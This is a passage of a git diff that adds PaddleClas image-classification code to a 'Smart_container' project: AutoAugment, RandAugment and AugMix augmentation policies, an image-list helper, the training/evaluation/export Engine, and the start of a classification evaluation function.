('AutoContrast', 0.6, 5)], + [('Invert', 0.6, 4), ('Equalize', 1.0, 8)], + [('Color', 0.6, 4), ('Contrast', 1.0, 8)], + [('Equalize', 0.8, 8), ('Equalize', 0.6, 3)], + ] + pc = [[AugmentOp(*a, hparams=hparams) for a in sp] for sp in policy] + return pc + + +def auto_augment_policy_originalr(hparams): + # ImageNet policy from https://arxiv.org/abs/1805.09501 with research posterize variation + policy = [ + [('PosterizeIncreasing', 0.4, 8), ('Rotate', 0.6, 9)], + [('Solarize', 0.6, 5), ('AutoContrast', 0.6, 5)], + [('Equalize', 0.8, 8), ('Equalize', 0.6, 3)], + [('PosterizeIncreasing', 0.6, 7), ('PosterizeIncreasing', 0.6, 6)], + [('Equalize', 0.4, 7), ('Solarize', 0.2, 4)], + [('Equalize', 0.4, 4), ('Rotate', 0.8, 8)], + [('Solarize', 0.6, 3), ('Equalize', 0.6, 7)], + [('PosterizeIncreasing', 0.8, 5), ('Equalize', 1.0, 2)], + [('Rotate', 0.2, 3), ('Solarize', 0.6, 8)], + [('Equalize', 0.6, 8), ('PosterizeIncreasing', 0.4, 6)], + [('Rotate', 0.8, 8), ('Color', 0.4, 0)], + [('Rotate', 0.4, 9), ('Equalize', 0.6, 2)], + [('Equalize', 0.0, 7), ('Equalize', 0.8, 8)], + [('Invert', 0.6, 4), ('Equalize', 1.0, 8)], + [('Color', 0.6, 4), ('Contrast', 1.0, 8)], + [('Rotate', 0.8, 8), ('Color', 1.0, 2)], + [('Color', 0.8, 8), ('Solarize', 0.8, 7)], + [('Sharpness', 0.4, 7), ('Invert', 0.6, 8)], + [('ShearX', 0.6, 5), ('Equalize', 1.0, 9)], + [('Color', 0.4, 0), ('Equalize', 0.6, 3)], + [('Equalize', 0.4, 7), ('Solarize', 0.2, 4)], + [('Solarize', 0.6, 5), ('AutoContrast', 0.6, 5)], + [('Invert', 0.6, 4), ('Equalize', 1.0, 8)], + [('Color', 0.6, 4), ('Contrast', 1.0, 8)], + [('Equalize', 0.8, 8), ('Equalize', 0.6, 3)], + ] + pc = [[AugmentOp(*a, hparams=hparams) for a in sp] for sp in policy] + return pc + + +def auto_augment_policy(name='v0', hparams=None): + hparams = hparams or _HPARAMS_DEFAULT + if name == 'original': + return auto_augment_policy_original(hparams) + elif name == 'originalr': + return auto_augment_policy_originalr(hparams) + elif name == 'v0': + return 
auto_augment_policy_v0(hparams) + elif name == 'v0r': + return auto_augment_policy_v0r(hparams) + else: + assert False, 'Unknown AA policy (%s)' % name + + +class AutoAugment(object): + def __init__(self, policy): + self.policy = policy + + def __call__(self, img): + sub_policy = random.choice(self.policy) + for op in sub_policy: + img = op(img) + return img + + +def auto_augment_transform(config_str, hparams): + """ + Create a AutoAugment transform + + :param config_str: String defining configuration of auto augmentation. Consists of multiple sections separated by + dashes ('-'). The first section defines the AutoAugment policy (one of 'v0', 'v0r', 'original', 'originalr'). + The remaining sections, not order sepecific determine + 'mstd' - float std deviation of magnitude noise applied + Ex 'original-mstd0.5' results in AutoAugment with original policy, magnitude_std 0.5 + + :param hparams: Other hparams (kwargs) for the AutoAugmentation scheme + + :return: A callable Transform Op + """ + config = config_str.split('-') + policy_name = config[0] + config = config[1:] + for c in config: + cs = re.split(r'(\d.*)', c) + if len(cs) < 2: + continue + key, val = cs[:2] + if key == 'mstd': + # noise param injected via hparams for now + hparams.setdefault('magnitude_std', float(val)) + else: + assert False, 'Unknown AutoAugment config section' + aa_policy = auto_augment_policy(policy_name, hparams=hparams) + return AutoAugment(aa_policy) + + +_RAND_TRANSFORMS = [ + 'AutoContrast', + 'Equalize', + 'Invert', + 'Rotate', + 'Posterize', + 'Solarize', + 'SolarizeAdd', + 'Color', + 'Contrast', + 'Brightness', + 'Sharpness', + 'ShearX', + 'ShearY', + 'TranslateXRel', + 'TranslateYRel', + #'Cutout' # NOTE I've implement this as random erasing separately +] + +_RAND_INCREASING_TRANSFORMS = [ + 'AutoContrast', + 'Equalize', + 'Invert', + 'Rotate', + 'PosterizeIncreasing', + 'SolarizeIncreasing', + 'SolarizeAdd', + 'ColorIncreasing', + 'ContrastIncreasing', + 'BrightnessIncreasing', 
+ 'SharpnessIncreasing', + 'ShearX', + 'ShearY', + 'TranslateXRel', + 'TranslateYRel', + #'Cutout' # NOTE I've implement this as random erasing separately +] + +# These experimental weights are based loosely on the relative improvements mentioned in paper. +# They may not result in increased performance, but could likely be tuned to so. +_RAND_CHOICE_WEIGHTS_0 = { + 'Rotate': 0.3, + 'ShearX': 0.2, + 'ShearY': 0.2, + 'TranslateXRel': 0.1, + 'TranslateYRel': 0.1, + 'Color': .025, + 'Sharpness': 0.025, + 'AutoContrast': 0.025, + 'Solarize': .005, + 'SolarizeAdd': .005, + 'Contrast': .005, + 'Brightness': .005, + 'Equalize': .005, + 'Posterize': 0, + 'Invert': 0, +} + + +def _select_rand_weights(weight_idx=0, transforms=None): + transforms = transforms or _RAND_TRANSFORMS + assert weight_idx == 0 # only one set of weights currently + rand_weights = _RAND_CHOICE_WEIGHTS_0 + probs = [rand_weights[k] for k in transforms] + probs /= np.sum(probs) + return probs + + +def rand_augment_ops(magnitude=10, hparams=None, transforms=None): + hparams = hparams or _HPARAMS_DEFAULT + transforms = transforms or _RAND_TRANSFORMS + return [ + AugmentOp( + name, prob=0.5, magnitude=magnitude, hparams=hparams) + for name in transforms + ] + + +class RandAugment(object): + def __init__(self, ops, num_layers=2, choice_weights=None): + self.ops = ops + self.num_layers = num_layers + self.choice_weights = choice_weights + + def __call__(self, img): + # no replacement when using weighted choice + ops = np.random.choice( + self.ops, + self.num_layers, + replace=self.choice_weights is None, + p=self.choice_weights) + for op in ops: + img = op(img) + return img + + +def rand_augment_transform(config_str, hparams): + """ + Create a RandAugment transform + + :param config_str: String defining configuration of random augmentation. Consists of multiple sections separated by + dashes ('-'). The first section defines the specific variant of rand augment (currently only 'rand'). 
The remaining + sections, not order sepecific determine + 'm' - integer magnitude of rand augment + 'n' - integer num layers (number of transform ops selected per image) + 'w' - integer probabiliy weight index (index of a set of weights to influence choice of op) + 'mstd' - float std deviation of magnitude noise applied + 'inc' - integer (bool), use augmentations that increase in severity with magnitude (default: 0) + Ex 'rand-m9-n3-mstd0.5' results in RandAugment with magnitude 9, num_layers 3, magnitude_std 0.5 + 'rand-mstd1-w0' results in magnitude_std 1.0, weights 0, default magnitude of 10 and num_layers 2 + + :param hparams: Other hparams (kwargs) for the RandAugmentation scheme + + :return: A callable Transform Op + """ + magnitude = _MAX_LEVEL # default to _MAX_LEVEL for magnitude (currently 10) + num_layers = 2 # default to 2 ops per image + weight_idx = None # default to no probability weights for op choice + transforms = _RAND_TRANSFORMS + config = config_str.split('-') + assert config[0] == 'rand' + config = config[1:] + for c in config: + cs = re.split(r'(\d.*)', c) + if len(cs) < 2: + continue + key, val = cs[:2] + if key == 'mstd': + # noise param injected via hparams for now + hparams.setdefault('magnitude_std', float(val)) + elif key == 'inc': + if bool(val): + transforms = _RAND_INCREASING_TRANSFORMS + elif key == 'm': + magnitude = int(val) + elif key == 'n': + num_layers = int(val) + elif key == 'w': + weight_idx = int(val) + else: + assert False, 'Unknown RandAugment config section' + ra_ops = rand_augment_ops( + magnitude=magnitude, hparams=hparams, transforms=transforms) + choice_weights = None if weight_idx is None else _select_rand_weights( + weight_idx) + return RandAugment(ra_ops, num_layers, choice_weights=choice_weights) + + +_AUGMIX_TRANSFORMS = [ + 'AutoContrast', + 'ColorIncreasing', # not in paper + 'ContrastIncreasing', # not in paper + 'BrightnessIncreasing', # not in paper + 'SharpnessIncreasing', # not in paper + 'Equalize', + 
'Rotate', + 'PosterizeIncreasing', + 'SolarizeIncreasing', + 'ShearX', + 'ShearY', + 'TranslateXRel', + 'TranslateYRel', +] + + +def augmix_ops(magnitude=10, hparams=None, transforms=None): + hparams = hparams or _HPARAMS_DEFAULT + transforms = transforms or _AUGMIX_TRANSFORMS + return [ + AugmentOp( + name, prob=1.0, magnitude=magnitude, hparams=hparams) + for name in transforms + ] + + +class AugMixAugment(object): + """ AugMix Transform + Adapted and improved from impl here: https://github.com/google-research/augmix/blob/master/imagenet.py + From paper: 'AugMix: A Simple Data Processing Method to Improve Robustness and Uncertainty - + https://arxiv.org/abs/1912.02781 + """ + + def __init__(self, ops, alpha=1., width=3, depth=-1, blended=False): + self.ops = ops + self.alpha = alpha + self.width = width + self.depth = depth + self.blended = blended # blended mode is faster but not well tested + + def _calc_blended_weights(self, ws, m): + ws = ws * m + cump = 1. + rws = [] + for w in ws[::-1]: + alpha = w / cump + cump *= (1 - alpha) + rws.append(alpha) + return np.array(rws[::-1], dtype=np.float32) + + def _apply_blended(self, img, mixing_weights, m): + # This is my first crack and implementing a slightly faster mixed augmentation. Instead + # of accumulating the mix for each chain in a Numpy array and then blending with original, + # it recomputes the blending coefficients and applies one PIL image blend per chain. + # TODO the results appear in the right ballpark but they differ by more than rounding. 
+ img_orig = img.copy() + ws = self._calc_blended_weights(mixing_weights, m) + for w in ws: + depth = self.depth if self.depth > 0 else np.random.randint(1, 4) + ops = np.random.choice(self.ops, depth, replace=True) + img_aug = img_orig # no ops are in-place, deep copy not necessary + for op in ops: + img_aug = op(img_aug) + img = Image.blend(img, img_aug, w) + return img + + def _apply_basic(self, img, mixing_weights, m): + # This is a literal adaptation of the paper/official implementation without normalizations and + # PIL <-> Numpy conversions between every op. It is still quite CPU compute heavy compared to the + # typical augmentation transforms, could use a GPU / Kornia implementation. + img_shape = img.size[0], img.size[1], len(img.getbands()) + mixed = np.zeros(img_shape, dtype=np.float32) + for mw in mixing_weights: + depth = self.depth if self.depth > 0 else np.random.randint(1, 4) + ops = np.random.choice(self.ops, depth, replace=True) + img_aug = img # no ops are in-place, deep copy not necessary + for op in ops: + img_aug = op(img_aug) + mixed += mw * np.asarray(img_aug, dtype=np.float32) + np.clip(mixed, 0, 255., out=mixed) + mixed = Image.fromarray(mixed.astype(np.uint8)) + return Image.blend(img, mixed, m) + + def __call__(self, img): + mixing_weights = np.float32( + np.random.dirichlet([self.alpha] * self.width)) + m = np.float32(np.random.beta(self.alpha, self.alpha)) + if self.blended: + mixed = self._apply_blended(img, mixing_weights, m) + else: + mixed = self._apply_basic(img, mixing_weights, m) + return mixed + + +def augment_and_mix_transform(config_str, hparams): + """ Create AugMix transform + + :param config_str: String defining configuration of random augmentation. Consists of multiple sections separated by + dashes ('-'). The first section defines the specific variant of rand augment (currently only 'rand'). 
The remaining + sections, not order specific determine + 'm' - integer magnitude (severity) of augmentation mix (default: 3) + 'w' - integer width of augmentation chain (default: 3) + 'd' - integer depth of augmentation chain (-1 is random [1, 3], default: -1) + 'b' - integer (bool), blend each branch of chain into end result without a final blend, less CPU (default: 0) + 'mstd' - float std deviation of magnitude noise applied (default: 0) + Ex 'augmix-m5-w4-d2' results in AugMix with severity 5, chain width 4, chain depth 2 + + :param hparams: Other hparams (kwargs) for the Augmentation transforms + + :return: A callable Transform Op + """ + magnitude = 3 + width = 3 + depth = -1 + alpha = 1. + blended = False + config = config_str.split('-') + assert config[0] == 'augmix' + config = config[1:] + for c in config: + cs = re.split(r'(\d.*)', c) + if len(cs) < 2: + continue + key, val = cs[:2] + if key == 'mstd': + # noise param injected via hparams for now + hparams.setdefault('magnitude_std', float(val)) + elif key == 'm': + magnitude = int(val) + elif key == 'w': + width = int(val) + elif key == 'd': + depth = int(val) + elif key == 'a': + alpha = float(val) + elif key == 'b': + blended = bool(val) + else: + assert False, 'Unknown AugMix config section' + ops = augmix_ops(magnitude=magnitude, hparams=hparams) + return AugMixAugment( + ops, alpha=alpha, width=width, depth=depth, blended=blended) + + +class RawTimmAutoAugment(object): + """TimmAutoAugment API for PaddleClas.""" + + def __init__(self, + config_str="rand-m9-mstd0.5-inc1", + interpolation="bicubic", + img_size=224, + mean=IMAGENET_DEFAULT_MEAN): + if isinstance(img_size, (tuple, list)): + img_size_min = min(img_size) + else: + img_size_min = img_size + + aa_params = dict( + translate_const=int(img_size_min * 0.45), + img_mean=tuple([min(255, round(255 * x)) for x in mean]), ) + if interpolation and interpolation != 'random': + aa_params['interpolation'] = _pil_interp(interpolation) + if 
config_str.startswith('rand'): + self.augment_func = rand_augment_transform(config_str, aa_params) + elif config_str.startswith('augmix'): + aa_params['translate_pct'] = 0.3 + self.augment_func = augment_and_mix_transform(config_str, + aa_params) + elif config_str.startswith('auto'): + self.augment_func = auto_augment_transform(config_str, aa_params) + else: + raise Exception( + "ConfigError: The TimmAutoAugment Op only support RandAugment, AutoAugment, AugMix, and the config_str only starts with \"rand\", \"augmix\", \"auto\"." + ) + + def __call__(self, img): + return self.augment_func(img) diff --git a/Smart_container/PaddleClas/ppcls/data/utils/__init__.py b/Smart_container/PaddleClas/ppcls/data/utils/__init__.py new file mode 100644 index 0000000..61d5aa2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/utils/__init__.py @@ -0,0 +1,13 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. \ No newline at end of file diff --git a/Smart_container/PaddleClas/ppcls/data/utils/get_image_list.py b/Smart_container/PaddleClas/ppcls/data/utils/get_image_list.py new file mode 100644 index 0000000..6f10935 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/utils/get_image_list.py @@ -0,0 +1,49 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import argparse +import base64 +import numpy as np + + +def get_image_list(img_file): + imgs_lists = [] + if img_file is None or not os.path.exists(img_file): + raise Exception("not found any img file in {}".format(img_file)) + + img_end = ['jpg', 'png', 'jpeg', 'JPEG', 'JPG', 'bmp'] + if os.path.isfile(img_file) and img_file.split('.')[-1] in img_end: + imgs_lists.append(img_file) + elif os.path.isdir(img_file): + for single_file in os.listdir(img_file): + if single_file.split('.')[-1] in img_end: + imgs_lists.append(os.path.join(img_file, single_file)) + if len(imgs_lists) == 0: + raise Exception("not found any img file in {}".format(img_file)) + imgs_lists = sorted(imgs_lists) + return imgs_lists + + +def get_image_list_from_label_file(image_path, label_file_path): + imgs_lists = [] + gt_labels = [] + with open(label_file_path, "r") as fin: + lines = fin.readlines() + for line in lines: + image_name, label = line.strip("\n").split() + label = int(label) + imgs_lists.append(os.path.join(image_path, image_name)) + gt_labels.append(int(label)) + return imgs_lists, gt_labels diff --git a/Smart_container/PaddleClas/ppcls/engine/__init__.py b/Smart_container/PaddleClas/ppcls/engine/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/ppcls/engine/engine.py b/Smart_container/PaddleClas/ppcls/engine/engine.py new file mode 100644 index 0000000..d0f2d64 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/engine.py @@ -0,0 +1,429 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. 
+# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import platform +import paddle +import paddle.distributed as dist +from visualdl import LogWriter +from paddle import nn +import numpy as np +import random + +from ppcls.utils.check import check_gpu +from ppcls.utils.misc import AverageMeter +from ppcls.utils import logger +from ppcls.utils.logger import init_logger +from ppcls.utils.config import print_config +from ppcls.data import build_dataloader +from ppcls.arch import build_model, RecModel, DistillationModel +from ppcls.arch import apply_to_static +from ppcls.loss import build_loss +from ppcls.metric import build_metrics +from ppcls.optimizer import build_optimizer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url +from ppcls.utils.save_load import init_model +from ppcls.utils import save_load + +from ppcls.data.utils.get_image_list import get_image_list +from ppcls.data.postprocess import build_postprocess +from ppcls.data import create_operators +from ppcls.engine.train import train_epoch +from ppcls.engine import evaluation +from ppcls.arch.gears.identity_head import IdentityHead +from ppcls.engine.slim import get_pruner, get_quaner + + +class Engine(object): + def __init__(self, config, mode="train"): + assert mode in ["train", "eval", "infer", "export"] + self.mode = mode + self.config = config + 
self.eval_mode = self.config["Global"].get("eval_mode", + "classification") + if "Head" in self.config["Arch"]: + self.is_rec = True + else: + self.is_rec = False + + # set seed + seed = self.config["Global"].get("seed", False) + if seed: + assert isinstance(seed, int), "The 'seed' must be a integer!" + paddle.seed(seed) + np.random.seed(seed) + random.seed(seed) + + # init logger + self.output_dir = self.config['Global']['output_dir'] + log_file = os.path.join(self.output_dir, self.config["Arch"]["name"], + f"{mode}.log") + init_logger(name='root', log_file=log_file) + print_config(config) + + # init train_func and eval_func + assert self.eval_mode in ["classification", "retrieval"], logger.error( + "Invalid eval mode: {}".format(self.eval_mode)) + self.train_epoch_func = train_epoch + self.eval_func = getattr(evaluation, self.eval_mode + "_eval") + + self.use_dali = self.config['Global'].get("use_dali", False) + + # for visualdl + self.vdl_writer = None + if self.config['Global']['use_visualdl'] and mode == "train": + vdl_writer_path = os.path.join(self.output_dir, "vdl") + if not os.path.exists(vdl_writer_path): + os.makedirs(vdl_writer_path) + self.vdl_writer = LogWriter(logdir=vdl_writer_path) + + # set device + assert self.config["Global"]["device"] in ["cpu", "gpu", "xpu"] + self.device = paddle.set_device(self.config["Global"]["device"]) + logger.info('train with paddle {} and device {}'.format( + paddle.__version__, self.device)) + + # AMP training + self.amp = True if "AMP" in self.config else False + if self.amp and self.config["AMP"] is not None: + self.scale_loss = self.config["AMP"].get("scale_loss", 1.0) + self.use_dynamic_loss_scaling = self.config["AMP"].get( + "use_dynamic_loss_scaling", False) + else: + self.scale_loss = 1.0 + self.use_dynamic_loss_scaling = False + if self.amp: + AMP_RELATED_FLAGS_SETTING = { + 'FLAGS_cudnn_batchnorm_spatial_persistent': 1, + 'FLAGS_max_inplace_grad_add': 8, + } + 
paddle.fluid.set_flags(AMP_RELATED_FLAGS_SETTING) + + # build dataloader + if self.mode == 'train': + self.train_dataloader = build_dataloader( + self.config["DataLoader"], "Train", self.device, self.use_dali) + if self.mode in ["train", "eval"]: + if self.eval_mode == "classification": + self.eval_dataloader = build_dataloader( + self.config["DataLoader"], "Eval", self.device, + self.use_dali) + elif self.eval_mode == "retrieval": + self.gallery_query_dataloader = None + if len(self.config["DataLoader"]["Eval"].keys()) == 1: + key = list(self.config["DataLoader"]["Eval"].keys())[0] + self.gallery_query_dataloader = build_dataloader( + self.config["DataLoader"]["Eval"], key, self.device, + self.use_dali) + else: + self.gallery_dataloader = build_dataloader( + self.config["DataLoader"]["Eval"], "Gallery", + self.device, self.use_dali) + self.query_dataloader = build_dataloader( + self.config["DataLoader"]["Eval"], "Query", + self.device, self.use_dali) + + # build loss + if self.mode == "train": + loss_info = self.config["Loss"]["Train"] + self.train_loss_func = build_loss(loss_info) + if self.mode in ["train", "eval"]: + loss_config = self.config.get("Loss", None) + if loss_config is not None: + loss_config = loss_config.get("Eval") + if loss_config is not None: + self.eval_loss_func = build_loss(loss_config) + else: + self.eval_loss_func = None + else: + self.eval_loss_func = None + + # build metric + if self.mode == 'train': + metric_config = self.config.get("Metric") + if metric_config is not None: + metric_config = metric_config.get("Train") + if metric_config is not None: + self.train_metric_func = build_metrics(metric_config) + else: + self.train_metric_func = None + else: + self.train_metric_func = None + + if self.mode in ["train", "eval"]: + metric_config = self.config.get("Metric") + if self.eval_mode == "classification": + if metric_config is not None: + metric_config = metric_config.get("Eval") + if metric_config is not None: + self.eval_metric_func = 
build_metrics(metric_config) + elif self.eval_mode == "retrieval": + if metric_config is None: + metric_config = [{"name": "Recallk", "topk": (1, 5)}] + else: + metric_config = metric_config["Eval"] + self.eval_metric_func = build_metrics(metric_config) + else: + self.eval_metric_func = None + + # build model + self.model = build_model(self.config["Arch"]) + # set @to_static for benchmark, skip this by default. + apply_to_static(self.config, self.model) + # load_pretrain + if self.config["Global"]["pretrained_model"] is not None: + if self.config["Global"]["pretrained_model"].startswith("http"): + load_dygraph_pretrain_from_url( + self.model, self.config["Global"]["pretrained_model"]) + else: + load_dygraph_pretrain( + self.model, self.config["Global"]["pretrained_model"]) + + # for slim + self.pruner = get_pruner(self.config, self.model) + self.quanter = get_quaner(self.config, self.model) + + # build optimizer + if self.mode == 'train': + self.optimizer, self.lr_sch = build_optimizer( + self.config["Optimizer"], self.config["Global"]["epochs"], + len(self.train_dataloader), [self.model]) + + # for distributed + self.config["Global"][ + "distributed"] = paddle.distributed.get_world_size() != 1 + if self.config["Global"]["distributed"]: + dist.init_parallel_env() + if self.config["Global"]["distributed"]: + self.model = paddle.DataParallel(self.model) + + # build postprocess for infer + if self.mode == 'infer': + self.preprocess_func = create_operators(self.config["Infer"][ + "transforms"]) + self.postprocess_func = build_postprocess(self.config["Infer"][ + "PostProcess"]) + + def train(self): + assert self.mode == "train" + print_batch_step = self.config['Global']['print_batch_step'] + save_interval = self.config["Global"]["save_interval"] + best_metric = { + "metric": 0.0, + "epoch": 0, + } + # key: + # val: metrics list word + self.output_info = dict() + self.time_info = { + "batch_cost": AverageMeter( + "batch_cost", '.5f', postfix=" s,"), + "reader_cost": 
AverageMeter( + "reader_cost", ".5f", postfix=" s,"), + } + # global iter counter + self.global_step = 0 + + if self.config["Global"]["checkpoints"] is not None: + metric_info = init_model(self.config["Global"], self.model, + self.optimizer) + if metric_info is not None: + best_metric.update(metric_info) + + # for amp training + if self.amp: + self.scaler = paddle.amp.GradScaler( + init_loss_scaling=self.scale_loss, + use_dynamic_loss_scaling=self.use_dynamic_loss_scaling) + + self.max_iter = len(self.train_dataloader) - 1 if platform.system( + ) == "Windows" else len(self.train_dataloader) + for epoch_id in range(best_metric["epoch"] + 1, + self.config["Global"]["epochs"] + 1): + acc = 0.0 + # for one epoch train + self.train_epoch_func(self, epoch_id, print_batch_step) + + if self.use_dali: + self.train_dataloader.reset() + metric_msg = ", ".join([ + "{}: {:.5f}".format(key, self.output_info[key].avg) + for key in self.output_info + ]) + logger.info("[Train][Epoch {}/{}][Avg]{}".format( + epoch_id, self.config["Global"]["epochs"], metric_msg)) + self.output_info.clear() + + # eval model and save model if possible + if self.config["Global"][ + "eval_during_train"] and epoch_id % self.config["Global"][ + "eval_interval"] == 0: + acc = self.eval(epoch_id) + if acc > best_metric["metric"]: + best_metric["metric"] = acc + best_metric["epoch"] = epoch_id + save_load.save_model( + self.model, + self.optimizer, + best_metric, + self.output_dir, + model_name=self.config["Arch"]["name"], + prefix="best_model") + logger.info("[Eval][Epoch {}][best metric: {}]".format( + epoch_id, best_metric["metric"])) + logger.scaler( + name="eval_acc", + value=acc, + step=epoch_id, + writer=self.vdl_writer) + + self.model.train() + + # save model + if epoch_id % save_interval == 0: + save_load.save_model( + self.model, + self.optimizer, {"metric": acc, + "epoch": epoch_id}, + self.output_dir, + model_name=self.config["Arch"]["name"], + prefix="epoch_{}".format(epoch_id)) + # save the 
latest model + save_load.save_model( + self.model, + self.optimizer, {"metric": acc, + "epoch": epoch_id}, + self.output_dir, + model_name=self.config["Arch"]["name"], + prefix="latest") + + if self.vdl_writer is not None: + self.vdl_writer.close() + + @paddle.no_grad() + def eval(self, epoch_id=0): + assert self.mode in ["train", "eval"] + self.model.eval() + eval_result = self.eval_func(self, epoch_id) + self.model.train() + return eval_result + + @paddle.no_grad() + def infer(self): + assert self.mode == "infer" and self.eval_mode == "classification" + total_trainer = paddle.distributed.get_world_size() + local_rank = paddle.distributed.get_rank() + image_list = get_image_list(self.config["Infer"]["infer_imgs"]) + # data split + image_list = image_list[local_rank::total_trainer] + + batch_size = self.config["Infer"]["batch_size"] + self.model.eval() + batch_data = [] + image_file_list = [] + for idx, image_file in enumerate(image_list): + with open(image_file, 'rb') as f: + x = f.read() + for process in self.preprocess_func: + x = process(x) + batch_data.append(x) + image_file_list.append(image_file) + if len(batch_data) >= batch_size or idx == len(image_list) - 1: + batch_tensor = paddle.to_tensor(batch_data) + out = self.model(batch_tensor) + if isinstance(out, list): + out = out[0] + if isinstance(out, dict): + out = out["output"] + result = self.postprocess_func(out, image_file_list) + print(result) + batch_data.clear() + image_file_list.clear() + + def export(self): + assert self.mode == "export" + use_multilabel = self.config["Global"].get("use_multilabel", False) + model = ExportModel(self.config["Arch"], self.model, use_multilabel) + if self.config["Global"]["pretrained_model"] is not None: + load_dygraph_pretrain(model.base_model, + self.config["Global"]["pretrained_model"]) + + model.eval() + save_path = os.path.join(self.config["Global"]["save_inference_dir"], + "inference") + if self.quanter: + self.quanter.save_quantized_model( + model, + save_path, 
+ input_spec=[ + paddle.static.InputSpec( + shape=[None] + self.config["Global"]["image_shape"], + dtype='float32') + ]) + else: + model = paddle.jit.to_static( + model, + input_spec=[ + paddle.static.InputSpec( + shape=[None] + self.config["Global"]["image_shape"], + dtype='float32') + ]) + paddle.jit.save(model, save_path) + + +class ExportModel(nn.Layer): + """ + ExportModel: add softmax onto the model + """ + + def __init__(self, config, model, use_multilabel): + super().__init__() + self.base_model = model + # we should choose a final model to export + if isinstance(self.base_model, DistillationModel): + self.infer_model_name = config["infer_model_name"] + else: + self.infer_model_name = None + + self.infer_output_key = config.get("infer_output_key", None) + if self.infer_output_key == "features" and isinstance(self.base_model, + RecModel): + self.base_model.head = IdentityHead() + if use_multilabel: + self.out_act = nn.Sigmoid() + else: + if config.get("infer_add_softmax", True): + self.out_act = nn.Softmax(axis=-1) + else: + self.out_act = None + + def eval(self): + self.training = False + for layer in self.sublayers(): + layer.training = False + layer.eval() + + def forward(self, x): + x = self.base_model(x) + if isinstance(x, list): + x = x[0] + if self.infer_model_name is not None: + x = x[self.infer_model_name] + if self.infer_output_key is not None: + x = x[self.infer_output_key] + if self.out_act is not None: + x = self.out_act(x) + return x diff --git a/Smart_container/PaddleClas/ppcls/engine/evaluation/__init__.py b/Smart_container/PaddleClas/ppcls/engine/evaluation/__init__.py new file mode 100644 index 0000000..e0cd778 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/evaluation/__init__.py @@ -0,0 +1,16 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from ppcls.engine.evaluation.classification import classification_eval +from ppcls.engine.evaluation.retrieval import retrieval_eval diff --git a/Smart_container/PaddleClas/ppcls/engine/evaluation/classification.py b/Smart_container/PaddleClas/ppcls/engine/evaluation/classification.py new file mode 100644 index 0000000..d59f2f4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/evaluation/classification.py @@ -0,0 +1,113 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import time +import platform +import paddle + +from ppcls.utils.misc import AverageMeter +from ppcls.utils import logger + + +def classification_eval(engine, epoch_id=0): + output_info = dict() + time_info = { + "batch_cost": AverageMeter( + "batch_cost", '.5f', postfix=" s,"), + "reader_cost": AverageMeter( + "reader_cost", ".5f", postfix=" s,"), + } + print_batch_step = engine.config["Global"]["print_batch_step"] + + metric_key = None + tic = time.time() + max_iter = len(engine.eval_dataloader) - 1 if platform.system( + ) == "Windows" else len(engine.eval_dataloader) + for iter_id, batch in enumerate(engine.eval_dataloader): + if iter_id >= max_iter: + break + if iter_id == 5: + for key in time_info: + time_info[key].reset() + if engine.use_dali: + batch = [ + paddle.to_tensor(batch[0]['data']), + paddle.to_tensor(batch[0]['label']) + ] + time_info["reader_cost"].update(time.time() - tic) + batch_size = batch[0].shape[0] + batch[0] = paddle.to_tensor(batch[0]).astype("float32") + if not engine.config["Global"].get("use_multilabel", False): + batch[1] = batch[1].reshape([-1, 1]).astype("int64") + # image input + out = engine.model(batch[0]) + # calc loss + if engine.eval_loss_func is not None: + loss_dict = engine.eval_loss_func(out, batch[1]) + for key in loss_dict: + if key not in output_info: + output_info[key] = AverageMeter(key, '7.5f') + output_info[key].update(loss_dict[key].numpy()[0], batch_size) + # calc metric + if engine.eval_metric_func is not None: + metric_dict = engine.eval_metric_func(out, batch[1]) + if paddle.distributed.get_world_size() > 1: + for key in metric_dict: + paddle.distributed.all_reduce( + metric_dict[key], 